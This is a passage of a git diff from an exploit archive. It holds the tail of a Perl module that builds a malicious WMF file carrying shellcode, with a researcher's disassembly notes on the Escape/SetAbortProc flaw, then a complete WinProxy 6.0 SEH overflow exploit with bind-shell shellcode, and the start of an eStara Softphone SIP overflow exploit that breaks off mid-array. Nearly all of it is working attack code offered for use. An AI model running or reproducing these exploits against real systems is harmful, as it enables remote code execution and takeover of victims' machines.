of largest record in WORDs */ + int(rand(64)+8), + # WORD NumOfParams; /* Not Used (always 0) */ + 0 + ). + # + # Filler data + # + $pre_buff. + # + # StandardMetaRecord - Escape() + # + pack('Vvv', + # DWORD Size; /* Total size of the record in WORDs */ + 4, + # WORD Function; /* Function number (defined in WINDOWS.H) */ + 0x0026, # Can also be 0xff26, 0x0626, etc... + # WORD Parameters[]; /* Parameter values passed to function */ + 9, + ). $shellcode . + # + # Filler data + # + $suf_buff. + # + # Complete the structure + # + pack('Vv', + 3, + 0 + ); + + + $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload..."); + + + # Transmit the HTTP response + my $req = + "HTTP/1.0 200 OK\r\n" . + "Content-Type: text/plain\r\n" . + "Content-Length: " . length($content) . "\r\n" . + "Connection: close\r\n" . + "\r\n" . + $content; + + + my $res = $fd->Send($req); + + # Prevents IE from throwing an error in some cases + select(undef, undef, undef, 0.1); + + $fd->Close(); + + # The Content-Disposition trick was not very reliable (2003 ignores it) + # "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n". +} + + +sub RandomWMFRecord { + my $type = int(rand(3)); + + if ($type == 0) { + # CreatePenIndirect + return pack('Vv', + 8, + 0x02FA + ). Pex::Text::RandomData(10) + } + elsif ( $type == 1 ) { + # CreateBrushIndirect + return pack('Vv', + 7, + 0x02FC + ). Pex::Text::RandomData(8) + } + else { + # Rectangle + return pack('Vv', + 7, + 0x041B + ). Pex::Text::RandomData(8) + } +} + + +1; + +__END__ + +Used with permission by san[at]xfocus.org: +------------------------------------------ + +The recent wmf vul is really fun, I found some interest things after +analysed it. I attached a very simple wmf file(64 bytes) which can crash +your explorer. You can simply change those 0xcc to your shellcode. 
+ +An attach wmf file constructs with a 18 bytes metafile header which +defined as following: + +typedef struct _WindowsMetaHeader +{ + WORD FileType; /* Type of metafile (0=memory, 1=disk) */ + WORD HeaderSize; /* Size of header in WORDS (always 9) */ + WORD Version; /* Version of Microsoft Windows used */ + DWORD FileSize; /* Total size of the metafile in WORDs */ + WORD NumOfObjects; /* Number of objects in the file */ + DWORD MaxRecordSize; /* The size of largest record in WORDs */ + WORD NumOfParams; /* Not Used (always 0) */ +} WMFHEAD; + +and two data records which defined as following: + +typedef struct _StandardMetaRecord +{ + DWORD Size; /* Total size of the record in WORDs */ + WORD Function; /* Function number (defined in WINDOWS.H) */ + WORD Parameters[]; /* Parameter values passed to function */ +} WMFRECORD; + +Somethings that we need to attention: + +1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2; +2. the attack file is larger than 64 bytes; +3. the last record always has a function number of 0000h, a Size of +00000003h, and no Parameters array; +4. the attack record has a function number of 0626h, which defined in +wingdi.h. 26h is important, it will flow to Escape function. I found +it will lead to SetAbortProc only the Parameters[0] is 0009h. + +.text:77C4B65C loc_77C4B65C: ; CODE XREF: PlayMetaFileRecord+43j +.text:77C4B65C ; DATA XREF: .text:off_77C769FE+o +.text:77C4B65C push [ebp+uFlags] ; case 0x26 +.text:77C4B65F push ebx +.text:77C4B660 call sub_77C4B68A +.text:77C4B665 cmp eax, edi +.text:77C4B667 mov [ebp+var_4], eax +.text:77C4B66A jnz loc_77C4B424 +.text:77C4B670 mov ax, [ebx+6] +.text:77C4B674 cmp ax, 0Fh +.text:77C4B678 jnz loc_77C5FC0A ; flow to Escape +... +.text:77C61062 loc_77C61062: ; CODE XREF: Escape+ECB7j +.text:77C61062 sub edi, 6 +.text:77C61065 jz short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h +... 
+.text:77C543E7 loc_77C543E7: ; CODE XREF: SetAbortProc+54j +.text:77C543E7 ; SetAbortProc+10720tj +.text:77C543E7 xor eax, eax +.text:77C543E9 mov [esi+14h], edi ; write callback pointer? +... +.text:77C604C8 owned: ; CODE XREF: sub_77C4B09C+1E4j +.text:77C604C8 mov eax, [eax+14h] ; the pointer +.text:77C604CB cmp eax, ecx +.text:77C604CD jz loc_77C4B286 +.text:77C604D3 push ecx +.text:77C604D4 push edi +.text:77C604D5 call eax ; got it + +Best Regards +-- +san + +# milw0rm.com [2005-12-27] diff --git a/platforms/windows/remote/1408.pl b/platforms/windows/remote/1408.pl index 72043584b..babf39730 100755 --- a/platforms/windows/remote/1408.pl +++ b/platforms/windows/remote/1408.pl 
@@ -1,90 +1,90 @@
-#!perl
-#
-# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
-#
-# Author: FistFucker (aka FistFuXXer)
-# e-Mail: FistFuXXer@gmx.de
-#
-#
-# Advisory:
-# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
-#
-# CVE info:
-# CAN-2005-4085
-#
-
-use IO::Socket;
-
-#
-# destination IP address
-#
-$ip = '127.0.0.1';
-
-#
-# destination TCP port
-#
-$port = 80;
-
-#
-# SE handler. 0x00, 0x0a, 0x0d free
-#
-$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
- # PAVDLL.01031240
-
-#
-# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
-#
-$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
-
-#
-# 0x00, 0x0a, 0x0d free shellcode
-#
-# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-#
-$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
- "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
- "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
- "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
- "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
- "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
- "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
- "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
- "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
- "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
- "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
- "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
- "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
- "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
- "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
- "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
- "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
- "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
- "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
- "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
- "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
- "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
-
-
-print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
-
-$sock = IO::Socket::INET->new
-(
-
- PeerAddr => $ip,
- PeerPort => $port,
- Proto => 'tcp',
- Timeout => 2
-
-) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
-
-print "[+] Connected.\n";
-print "[+] Trying to overwrite SE handler...\n";
-
-$sock->send( "GET / HTTP/1.0\r\n" );
-$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
-
-print "[+] Done. Now check for bind shell on $ip:4444!";
-
-close($sock);
-
-# milw0rm.com [2006-01-07]
+#!perl
+#
+# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
+#
+# Author: FistFucker (aka FistFuXXer)
+# e-Mail: FistFuXXer@gmx.de
+#
+#
+# Advisory:
+# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
+#
+# CVE info:
+# CAN-2005-4085
+#
+
+use IO::Socket;
+
+#
+# destination IP address
+#
+$ip = '127.0.0.1';
+
+#
+# destination TCP port
+#
+$port = 80;
+
+#
+# SE handler. 0x00, 0x0a, 0x0d free
+#
+$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
+ # PAVDLL.01031240
+
+#
+# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
+#
+$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
+
+#
+# 0x00, 0x0a, 0x0d free shellcode
+#
+# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+#
+$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
+ "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
+ "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
+ "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
+ "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
+ "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
+ "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
+ "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
+ "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
+ "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
+ "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
+ "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
+ "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
+ "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
+ "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
+ "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
+ "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
+ "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
+ "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
+ "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
+ "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
+ "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
+
+
+print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
+
+$sock = IO::Socket::INET->new
+(
+
+ PeerAddr => $ip,
+ PeerPort => $port,
+ Proto => 'tcp',
+ Timeout => 2
+
+) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
+
+print "[+] Connected.\n";
+print "[+] Trying to overwrite SE handler...\n";
+
+$sock->send( "GET / HTTP/1.0\r\n" );
+$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
+
+print "[+] Done. Now check for bind shell on $ip:4444!";
+
+close($sock);
+
+# milw0rm.com [2006-01-07]
diff --git a/platforms/windows/remote/1413.c b/platforms/windows/remote/1413.c
index 4a0ebf5fb..a64c8817a 100755
--- a/platforms/windows/remote/1413.c
+++ b/platforms/windows/remote/1413.c 
@@ -1,377 +1,377 @@ -/*************************************** -eStara Softphone buffer overflow exploit -tested on : - eStara Softphone 3.0.1.14 - |||||| - eStara Softphone 3.0.1.46 -Vender website : http://www.estara.com/softphone/softph.exe - -Run this application, then use nc to send builded packet : -nc -u 127.0.0.1 5060 -#include - -unsigned char invite[] = { - 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, - 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x0D, 0x0A, - 0x56, 0x69, 0x61, 0x3A, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x2F, 0x55, 0x44, 0x50, - 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x3A, 0x33, 0x33, 0x33, 0x33, - 0x3B, 0x62, 0x72, 0x61, 0x6E, 0x63, 0x68, 0x3D, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x30, - 0x30, 0x30, 0x30, 0x34, 0x31, 0x37, 0x38, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x2E, 0x30, - 0x30, 0x30, 0x30, 0x32, 0x46, 0x32, 0x41, 0x0D, 0x0A, 0x46, 0x72, 0x6F, 0x6D, 0x3A, 0x20, 0x34, - 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, - 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x3B, 0x74, 0x61, 0x67, 0x3D, 0x34, 0x31, 0x37, 0x38, 0x0D, 0x0A, - 0x54, 0x6F, 0x3A, 0x20, 0x52, 0x65, 0x63, 0x65, 0x69, 0x76, 0x65, 0x72, 0x20, 0x3C, 0x73, 0x69, - 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, - 0x43, 0x61, 0x6C, 0x6C, 0x2D, 0x49, 0x44, 0x3A, 0x20, 0x32, 0x34, 0x34, 0x33, 0x30, 0x40, 0x31, - 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x43, 0x53, 0x65, 0x71, 0x3A, - 0x20, 0x31, 0x38, 0x32, 0x32, 0x35, 0x20, 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x0D, 0x0A, 0x43, - 0x6F, 0x6E, 0x74, 0x61, 0x63, 0x74, 0x3A, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, - 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, - 0x45, 0x78, 0x70, 0x69, 0x72, 0x65, 0x73, 0x3A, 0x20, 0x31, 
0x32, 0x30, 0x30, 0x0D, 0x0A, 0x4D, - 0x61, 0x78, 0x2D, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64, 0x73, 0x3A, 0x20, 0x37, 0x30, 0x0D, - 0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 0x61, - 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2F, 0x73, 0x64, 0x70, 0x0D, 0x0A, - 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, - 0x34, 0x32, 0x32, 0x32, 0x0D, 0x0A, 0x0D, 0x0A, 0x76, 0x3D, 0x30, 0x0D, 0x0A, 0x6F, 0x3D, 0x34, - 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x49, 0x4E, - 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, - 0x0A, 0x73, 0x3D, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x53, 0x44, 0x50, 0x0D, 0x0A, - 0x63, 0x3D, 0x49, 0x4E, 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, - 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x74, 0x3D, 0x30, 0x20, 0x30, 0x0D, 0x0A, 0x6D, 0x3D, 0x61, 0x75, - 0x64, 0x69, 0x6F, 0x20, 0x39, 0x38, 0x37, 0x36, 0x20, 0x52, 0x54, 0x50, 0x2F, 0x41, 0x56, 0x50, - 0x20, 0x30, 0x0D, 0x0A, 0x61, 0x3D, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 
